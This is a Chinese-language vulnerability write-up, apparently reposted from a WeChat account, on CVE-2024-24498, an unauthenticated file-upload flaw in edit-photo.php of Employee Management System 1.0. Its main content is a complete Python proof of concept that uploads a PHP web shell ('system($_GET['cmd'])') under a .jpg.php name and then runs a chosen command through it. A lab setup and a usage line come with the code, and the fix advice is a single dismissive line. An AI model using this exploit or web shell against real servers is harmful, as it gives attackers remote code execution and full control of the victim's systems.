免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
employee management system-1.0
项目下载地址
https://www.sourcecodester.com/php/16999/employee-management-system.html03
—
靶场搭建
php+mysql项目,下载源码使用小皮面板,就可以搭建起靶场了
下载后解压到小皮面板www目录下
找到employee_akpoly.sql文件,在MySQL中初始化表结构
然后修改employee_akpolydatabase下面的两个文件中的数据库密码,然后一键启动即可
访问http://localhost/employee_akpoly/
04
—
漏洞描述
员工管理系统1.0中的edit-photo.php组件存在未限制的文件上传漏洞,允许远程攻击者通过该漏洞执行任意代码。攻击者可以利用这个漏洞上传恶意文件,进而在受影响的系统上执行恶意代码,可能导致系统被完全控制。
05
—
漏洞复现
存在漏洞的路径
/employee_akpoly/Admin/edit-photo.php06
—
批量扫描 poc
python版的poc文件内容如下
### Vendor Homepage:# https://www.sourcecodester.com### Software Link:# [Employee Management System](https://www.sourcecodester.com/php/16999/employee-management-system.html)import requestsimport sysimport argparseimport randomimport stringfrom urllib.parse import urlparse, urljoindef random_filename(base="shellexec", ext=".jpg.php"):random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))return f"{base}{random_str}{ext}"def format_url(base_url, endpoint):if not base_url.endswith('/'):base_url += '/'return urljoin(base_url, endpoint)def send_post_request(base_url, filename, proxies):post_url = format_url(base_url, 'Admin/edit-photo.php')boundary = "---------------------------296946627421322280062813742794"headers = {'Host': urlparse(base_url).hostname,'Content-Type': f'multipart/form-data; boundary={boundary}',}data = f"--{boundary}rn"data += f'Content-Disposition: form-data; name="avatar"; filename="{filename}"rn'data += "Content-Type: image/jpegrnrn"data += "<?php system($_GET['cmd']); ?>rn"data += f"--{boundary}rn"data += 'Content-Disposition: form-data; name="btnsave"rnrn'data += "rn"data += f"--{boundary}--rn"response = requests.post(post_url, headers=headers, data=data.encode(), verify=False, proxies=proxies)return response.okdef send_get_request(base_url, filename, command, proxies):get_url = format_url(base_url, f'uploadImage/{filename}')params = {'cmd': command}headers = {'Host': urlparse(base_url).hostname,}response = requests.get(get_url, headers=headers, params=params, verify=False, proxies=proxies)print(response.text)def main():parser = argparse.ArgumentParser(description='Send requests to a specified URL.')parser.add_argument('-u', '--url', type=str, required=True, help='Base URL to send the requests to')parser.add_argument('-c', '--command', type=str, required=True, help='Command to be executed')args = parser.parse_args()filename = random_filename()full_path = format_url(args.url, f'uploadImage/{filename}')proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080',}if send_post_request(args.url, filename, proxies):print(f"File uploaded successfully: {filename}")print(f"Full path: {full_path}?cmd={args.command}")send_get_request(args.url, filename, args.command, proxies)else:print("Failed to upload the file.")if __name__ == "__main__":main()
本地创建unauthenticated_file_upload_rce.py文件,将内容粘贴进去即可,运行POC命令如下,其中-c参数用于指定需要在靶场上执行的命令
python3 unauthenticated_file_upload_rce.py -u http://localhost/employee_akpoly/ -c 'id'
07
—
修复建议
开源项目,自行修复。
原文始发于微信公众号(AI与网安):CVE-2024-24498
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论